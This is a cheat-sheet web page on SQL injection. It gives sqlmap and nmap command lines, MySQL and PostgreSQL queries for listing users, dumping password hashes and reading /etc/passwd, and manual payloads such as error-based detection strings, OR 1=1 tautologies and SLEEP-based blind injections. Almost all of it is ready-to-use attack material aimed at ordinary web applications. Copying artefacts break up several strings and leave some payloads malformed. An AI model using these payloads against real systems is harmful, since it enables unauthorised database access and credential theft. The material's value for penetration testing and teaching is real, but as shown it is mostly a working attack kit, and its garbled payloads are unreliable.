Show Menu

Injection SQL Cheat Sheet by

security     infosec     hacking

Automated tools

SQLMAP
sqlmap -u "­url­" --forms --batch --crawl=10 --level=5 --risk=3
NMAP
nmap -p80 --scri­pt=­htt­p-s­ql-­inj­ection --scri­pt-­arg­s=h­ttp­spi­der.ma­xpa­geo­cou­nt=200 <ta­rge­t>

Mysql

Version
SELECT @@version;
Comments
/ / ou #
Current user
SELECT user(); || SELECT system­_user()
List users
SELECT user FROM mysql.u­ser;
List password hashes
SELECT host, user, password FROM mysql.u­ser;
Current database
SELECT database()
List databases
SELECT schema­_name FROM inform­ati­on_­sch­ema.sc­hemata; || SELECT distin­ct(db) FROM mysql.db
List tables
SELECT table_­sch­ema­,ta­ble­_name FROM inform­ati­on_­sch­ema.tables WHERE table_­schema != ‘mysql’ AND table_­schema != ‘infor­mat­ion­_sc­hema’
List collumns
SELECT table_­schema, table_­name, column­_name FROM inform­ati­on_­sch­ema.co­lumns WHERE table_­schema != ‘mysql’ AND table_­schema != ‘infor­mat­ion­_sc­hema’
Find Tables From Column Name
SELECT table_­schema, table_name FROM inform­ati­on_­sch­ema.co­lumns WHERE column­_name = ‘usern­ame’;
Time delay
SELECT BENCHM­ARK­(10­000­00,­MD5­(‘A’)); SELECT SLEEP(5); # >= 5.0.12
Local File Access
…’ UNION ALL SELECT LOAD_F­ILE­(‘/­etc­/pa­sswd’) —
Hostna­me/IP Address
SELECT @@host­name;
Create user
CREATE USER test1 IDENTIFIED BY ‘pass1′; —
Delete user
DROP USER test1; —
Location of the db file
SELECT @@datadir;
 

SQLMAP

sqlmap -u "­url­" -DBS
sqlmap -u "­url­" -table -D [database]
sqlmap -u "­url­" -columns -D [database] -T [table]
sqlmap -u "­url­" -dump -D [database] -T [table]

Manually Attack

Quick detect INTEGERS
select 1 and row(1,­1)>­(select count(­),­con­cat­(CO­NCA­T(@­@VE­RSI­ON)­,0x­3a,­flo­or(­ran­d()­2))x from (select 1 union select 2)a group by x limit 1))
Quick detect STRINGS
'+(select 1 and row(1,­1)>­(select count(­),­con­cat­(CO­NCA­T(@­@VE­RSI­ON)­,0x­3a,­flo­or(­ran­d()­2))x from (select 1 union select 2)a group by x limit 1))+'
Clear SQL Test
produc­t.p­hp?id=4 produc­t.p­hp?­id=5-1 produc­t.p­hp?id=4 OR 1=1 produc­t.p­hp?­id=-1 OR 17-7=10
Blind SQL Injection
SLEEP(­25)-- SELECT BENCHM­ARK­(10­000­00,­MD5­('A'));
Real world sample
Produc­tID=1 OR SLEEP(­25)=0 LIMIT 1-- Produc­tID=1) OR SLEEP(­25)=0 LIMIT 1-- Produc­tID=1' OR SLEEP(­25)=0 LIMIT 1-- Produc­tID=1') OR SLEEP(­25)=0 LIMIT 1-- Produc­tID=1)) OR SLEEP(­25)=0 LIMIT 1-- Produc­tID­=SELECT SLEEP(­25)--

PostgreSQL

Version
SELECT version()
Comments
-comment | / comment /
Current user
SELECT user; SELECT curren­t_user; SELECT sessio­n_user; SELECT usename FROM pg_user; SELECT getpgu­ser­name();
List users
SELECT usename FROM pg_user
List DBA Accounts
SELECT usename FROM pg_user WHERE usesuper IS TRUE
List password hashes
SELECT usename, passwd FROM pg_shadow — priv
Current database
SELECT curren­t_d­ata­base()
List databases
SELECT datname FROM pg_dat­abase
List tables
SELECT c.relname FROM pg_cat­alo­g.p­g_class c LEFT JOIN pg_cat­alo­g.p­g_n­ame­space n ON n.oid = c.reln­ame­space WHERE c.relkind IN (‘r’,”) AND n.nspname NOT IN (‘pg_c­ata­log’, ‘pg_to­ast’) AND pg_cat­alo­g.p­g_t­abl­e_i­s_v­isi­ble­(c.oid)
List collumns
SELECT relname, A.attname FROM pg_class C, pg_nam­espace N, pg_att­ribute A, pg_type T WHERE (C.rel­kin­d=’r') AND (N.oid­=C.r­el­nam­espace) AND (A.att­rel­id=­C.oid) AND (A.att­typ­id=­T.oid) AND (A.att­num­>0) AND (NOT A.atti­sdr­opped) AND (N.nspname ILIKE ‘public’)
Find Tables From Column Name
SELECT DISTINCT relname FROM pg_class C, pg_nam­espace N, pg_att­ribute A, pg_type T WHERE (C.rel­kin­d=’r') AND (N.oid­=C.r­el­nam­espace) AND (A.att­rel­id=­C.oid) AND (A.att­typ­id=­T.oid) AND (A.att­num­>0) AND (NOT A.atti­sdr­opped) AND (N.nspname ILIKE ‘public’) AND attname LIKE ‘%pass­word%’;
Time delay
SELECT pg_sle­ep(10);
Local File Access
CREATE TABLE mydata(t text); COPY mydata FROM ‘/etc/­pas­swd’;
Hostna­me/IP Address
SELECT inet_s­erv­er_­addr();
Port
SELECT inet_s­erv­er_­port();
Create user
CREATE USER test1 PASSWORD ‘pass1′ CREATEUSER
Delete user
DROP USER test1;
Location of the db file
SELECT curren­t_s­ett­ing­(‘d­ata­_di­rec­tory’);

Download the Injection SQL Cheat Sheet

2 Pages
//media.cheatography.com/storage/thumb/neolex_injection-sql.750.jpg

PDF (recommended)

Alternative Downloads

Share This Cheat Sheet!

 

Comments

No comments yet. Add yours below!

Add a Comment

Your Comment

Please enter your name.

    Please enter your email address

      Please enter your Comment.

          Related Cheat Sheets

          Cisco Device Security Cheat Sheet